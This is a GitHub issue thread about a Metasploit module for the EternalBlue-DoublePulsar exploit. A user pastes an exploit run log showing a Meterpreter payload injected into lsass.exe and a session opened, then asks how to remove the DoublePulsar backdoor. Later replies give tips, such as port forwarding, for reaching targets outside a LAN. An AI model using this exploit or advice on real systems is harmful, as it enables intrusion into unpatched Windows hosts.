Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1

Eternalblue Double Pulsar - Remove Backdoor #80

Open zeldp opened 6 years ago

zeldp commented 6 years ago

Hi,

Can anyone please let me know how I can remove the backdoor that has been installed? I used the Eternalblue-Doublepulsar exploit with the payload windows/x64/meterpreter/bind_tcp.

Process inject - lsass.exe
Target Architecture - x64
DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/
ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/

[*] Started bind handler
[*] x.x.x.x:445 - Generating Eternalblue XML data
[*] x.x.x.x:445 - Generating Doublepulsar XML data
[*] x.x.x.x:445 - Generating payload DLL for Doublepulsar
[*] x.x.x.x:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] x.x.x.x:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
[+] x.x.x.x:445 - Backdoor is already installed
[*] x.x.x.x:445 - Launching Doublepulsar...
000f:err:service:process_send_command receiving command result timed out
[*] Sending stage (206403 bytes) to 10.136.8.13
[*] Meterpreter session 2 opened (x.x.x.x:44911 -> x.x.x.x.13:4444) at 2018-07-13 12:35:02 -0400
0015:err:service:process_send_command receiving command result timed out
002b:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
[+] x.x.x.x:445 - Remote code executed... 3... 2... 1...

Thank you.

ronviajero commented 6 years ago

I'm having the same issue... how do you resolve this?

avacs commented 6 years ago

I'm also having the same issue.

tihon49 commented 6 years ago

So.... how to fix it?

davideo777 commented 5 years ago

Is this problem resolved?

landmorew commented 5 years ago

Reboot the target host. Since it resides in memory, just rebooting the machine should be enough to clear out your previous backdoor.

peterpt commented 5 years ago

You should all know that this Ruby script cannot exploit an external target using its LAN IP, because the payload on the target will connect to the IP configured in your LHOST, which is the LAN IP. You should use a modem to run this plugin; this way you will get an ISP DHCP release which is not in the range of LAN IPs, basically a direct external IP 212.xxx.xxx.xxx instead of 192.168.xxx.xxx. Alternatively, a port forward should be set up on your router to forward all WAN packets to your Linux LAN IP.

GetRektBoy724 commented 3 years ago

And try not to use the bind_tcp payload.